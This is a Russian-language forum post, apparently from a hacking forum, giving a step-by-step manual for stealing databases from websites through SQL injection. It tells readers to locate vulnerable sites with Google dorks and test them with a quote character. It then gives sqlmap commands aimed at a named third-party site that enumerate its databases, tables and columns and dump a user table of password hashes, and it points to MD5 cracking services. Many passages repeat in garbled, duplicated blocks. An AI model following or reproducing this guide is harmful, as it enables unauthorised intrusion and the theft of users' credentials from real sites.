Всем привет, написал мануал по сливу баз данных с сайтов.
Для этого нам понадобится
Шаг 1.
Первое что мы сделаем, это найдем сайты что уязвимы к SQL-инъекции. Есть очень много способов выявить её, но для меня самый лучший останеться поиск по доркам.
И так, пристуим.
Допустим вы ищите используя эту строку look.php?id= , и вы получили один из веб сайтов на примере этого:
что бы проверить его на уязвимость просто подставьте в конец ссылки «'» такой знак в результате вы должны получить вот это
Если страница вернёт SQL ошибку, либо пропадет часть контента, значит страница уязвима для SQLMAP SQL-инъекции. Если она загружается или перенаправляет вас на другую страницу, переходите к следующей странице в результатах поиска Гугл.
посмотрите на скришоты ниже
Для этого нам понадобится
Kali linux(так же он есть на win если хотите что бы я показал как сливать на нем пишите в коменты.
Дорки(поисковые запросы дял поиска сайтов с уязвимостью) их я оставлю в конце статьи в формате txt.
Дорки(поисковые запросы дял поиска сайтов с уязвимостью) их я оставлю в конце статьи в формате txt.
Шаг 1.
Первое что мы сделаем, это найдем сайты что уязвимы к SQL-инъекции. Есть очень много способов выявить её, но для меня самый лучший останеться поиск по доркам.
И так, пристуим.
Допустим вы ищите используя эту строку look.php?id= , и вы получили один из веб сайтов на примере этого:
что бы проверить его на уязвимость просто подставьте в конец ссылки «'» такой знак в результате вы должны получить вот это
Если страница вернёт SQL ошибку, либо пропадет часть контента, значит страница уязвима для SQLMAP SQL-инъекции. Если она загружается или перенаправляет вас на другую страницу, переходите к следующей странице в результатах поиска Гугл.
посмотрите на скришоты ниже
Шаг 2
Строим список баз данных СУБД используя SQLMAP SQL-инъекцию
Заходим в терминал Linux и пишем вот такую команду
Обзор команды
sqlmap — имя бинарного файла программы sqlmap.
-u — целевой адрес например ( http://www.wlnetwork.com/membership/look.php?id=69 )
--dbs — перечислить какие базы данных присутсвуют на сайте.[/spoiler]
и так, сейчас у нас всего 1 база данных, information_schema это стандартная база данных которая есть почти в каждом СУБД MySQL. Это значит что мы направим свой инетерс на бд wlndemc_membersdb.
Строим список баз данных СУБД используя SQLMAP SQL-инъекцию
Заходим в терминал Linux и пишем вот такую команду
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 --dbs
Обзор команды
sqlmap — имя бинарного файла программы sqlmap.
-u — целевой адрес например ( http://www.wlnetwork.com/membership/look.php?id=69 )
--dbs — перечислить какие базы данных присутсвуют на сайте.[/spoiler]
Шаг 3
Построение списка таблиц базы данных.
Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
Круто, это база имеет 114 таблиц.
Построение списка таблиц базы данных.
Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb --tables
Круто, это база имеет 114 таблиц.
Ну и конечно мы хотим проверить, что находится внутри think_user, используя SQLMAP SQL-инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль.
Шаг 4
Построение списка столбцов целевой таблицы.
Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
Ага, вот и то что мы искали) осталось только вытянуть пароли и все остальное)
Шаг 5
С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных.
всё это делаем вот такой командой:
Шаг 4
Построение списка столбцов целевой таблицы.
Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --columns
Шаг 5
С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных.
всё это делаем вот такой командой:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --dump
как мы видим у нас пароли в виде хеша md5 вот самые лучшие сервисы который вам помогут расшифровать md5
Вот еще небольшое видео, что бы вы наблюдали сам процесс
Вот еще пару сайтов для тренеровки
дорки
[FILE]https://yadi.sk/i/Sac8GG1N3Wjvhy[/FILE]
вот и всё) если хотите более подробный гайд, то ставьте репу(если считаете что статья вам помогла) и пишите в комментах, обязательно допишу)
[/spoiler]Вот еще небольшое видео, что бы вы наблюдали сам процесс
дорки
[FILE]https://yadi.sk/i/Sac8GG1N3Wjvhy[/FILE]
вот и всё) если хотите более подробный гайд, то ставьте репу(если считаете что статья вам помогла) и пишите в комментах, обязательно допишу)
Последнее редактирование:
